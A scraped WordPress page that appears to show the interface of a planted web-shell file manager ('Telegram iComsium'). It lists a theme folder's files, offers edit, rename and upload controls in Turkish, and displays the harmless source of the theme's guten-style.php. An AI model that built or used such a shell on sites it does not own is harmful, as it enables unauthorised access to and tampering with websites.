Telegram iComsium Current root:
/nas/content/live/myalphanotify/wp-content/themes/bastet
Current path:
/nas/content/live/myalphanotify/wp-content/themes/bastet
..
404.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
LICENSE
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
README.md
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
archive.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
bootstrap.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
bootstrap.min.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
comments.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
composer.json
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
css
fonts
footer-empty.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
footer.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
functions.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
gulpfile.js
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
header-empty.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
header.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
images
inc
index.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
js
languages
package.json
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
page-templates
page.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
phpcs.xml.dist
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
readme.txt
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
sass
screenshot.png
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
search.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
setup
sidebar.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
single.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
style-rtl.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
style.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
style.min.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
template-parts
vendor
webpack.config.js
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
woocommerce.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
woocommerce.min.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
Dosya Düzenle: guten-style.php
<?php /** * Gutenberg editor styles * * @package bastet */ if ( ! function_exists( 'bastet_hook_editor_styles' ) ) : /** * Enqueue theme dynamic styles and fonts on gutenberg editor */ function bastet_hook_editor_styles() { wp_enqueue_style( 'bastet-guten-styles', admin_url( 'admin-ajax.php?action=bastet-editor-style' ), array(), BASTET_VERSION ); wp_enqueue_style( 'bastet-fonts-url', esc_url( bastet_fonts_url() ), array(), BASTET_VERSION ); } add_action( 'enqueue_block_editor_assets', 'bastet_hook_editor_styles' ); endif; if ( ! function_exists( 'bastet_get_used_fonts' ) ) : /** * Get theme dynamic or default fonts */ function bastet_get_used_fonts() { $heading_typo = get_theme_mod( 'body_typography_heading', array( 'font-family' => 'Poppins', 'variant' => '700', ) ); $body_typo = get_theme_mod( 'body_typography_body', array( 'font-family' => 'Poppins', 'variant' => '400', 'font-size' => '1rem', 'line-height' => '1.5', ) ); $p_typo = get_theme_mod( 'body_typography_parg', array( 'font-family' => 'Roboto Slab', 'font-size' => '1.05em', 'line-height' => '1.749em', ) ); return array( 'heading' => $heading_typo, 'body' => $body_typo, 'p' => $p_typo, ); } endif; if ( ! function_exists( 'bastet_editor_style' ) ) : /** * Generate css for theme dynamic styles */ function bastet_editor_style() { header( 'Content-Type: text/css; charset=UTF-8' ); $used_fonts = bastet_get_used_fonts(); echo '.editor-post-title__block .editor-post-title__input { font-family: ' . esc_attr( $used_fonts['heading']['font-family'] ) . '; color: ' . esc_attr( get_theme_mod( 'heading_color', '#0a0a0a' ) ) . '; } .editor-styles-wrapper ul,.editor-styles-wrapper ol { font-family: ' . esc_attr( $used_fonts['body']['font-family'] ) . '; } .post-type-post .wp-block { max-width: 760px; } .post-type-post .wp-block[data-align=full] { max-width: none; } .post-type-post .wp-block[data-align=wide] { max-width: 1040px; } .editor-styles-wrapper ul { list-style: disc !important; } .editor-styles-wrapper .wp-block-list li { margin-bottom:10px; } .editor-styles-wrapper .wp-block-list li ol, .editor-styles-wrapper .wp-block-list li ul{ padding-top:10px; } .editor-styles-wrapper { font-family: ' . esc_attr( $used_fonts['body']['font-family'] ) . '; font-size: ' . esc_attr( $used_fonts['body']['font-size'] ) . '; line-height: ' . esc_attr( $used_fonts['body']['line-height'] ) . '; color: ' . esc_attr( get_theme_mod( 'body_color', '#545454' ) ) . '; } .editor-styles-wrapper h1,.editor-styles-wrapper h2, .editor-styles-wrapper h3,.editor-styles-wrapper h4, .editor-styles-wrapper h5,.editor-styles-wrapper h6 { font-family: ' . esc_attr( $used_fonts['heading']['font-family'] ) . '; font-weight: ' . esc_attr( $used_fonts['heading']['variant'] ) . '; color: ' . esc_attr( get_theme_mod( 'heading_color', '#0a0a0a' ) ) . '; } .editor-styles-wrapper p { font-family: ' . esc_attr( $used_fonts['p']['font-family'] ) . '; font-size: ' . esc_attr( $used_fonts['p']['font-size'] ) . '; line-height: ' . esc_attr( $used_fonts['p']['line-height'] ) . '; margin-bottom: 1.6875em; } .post-type-post [class*="wp-block"] { margin-bottom: 28px; } .wp-block-query ul { margin: 0 30px 0 0 !important; } .wp-block-query .wp-block-post-title { margin-bottom: 12px !important; } .wp-block-query .wp-block-post-date { margin-bottom: 12px !important; } .wp-block-query li { margin-bottom: 30px !important; } .wp-block-query .wp-block-post-date { font-size: 12px; text-transform: uppercase; letter-spacing: 1px; opacity: 0.9; } :root { --primary-color: ' . esc_attr( get_theme_mod( 'primary_color', '#fa192f' ) ) . '; --secondary-color: ' . esc_attr( get_theme_mod( 'sec_color', '#5D92D1' ) ) . ';; --secondary-alt-color: ' . esc_attr( get_theme_mod( 'sec_alt_color', '#f2f2f1' ) ) . ';; --global-shadow-color: ' . esc_attr( get_theme_mod( 'shadow_color', 'rgba(0,0,0,0.06)' ) ) . ';; } '; exit; } add_action( 'wp_ajax_nopriv_bastet-editor-style', 'bastet_editor_style' ); add_action( 'wp_ajax_bastet-editor-style', 'bastet_editor_style' ); endif;
Kaydet
Dosya Yükle
Yükle
setup - Alpha Notify
Home
setup
Buy Now
Contact US
Cart
setup
Power Outage
Device Setup
Download
our Mobile Setup PDF for a complete how-to guide.
Home
setup
Buy Now
Contact US
Cart
Archives
May 2026
Categories
Uncategorized
Search for: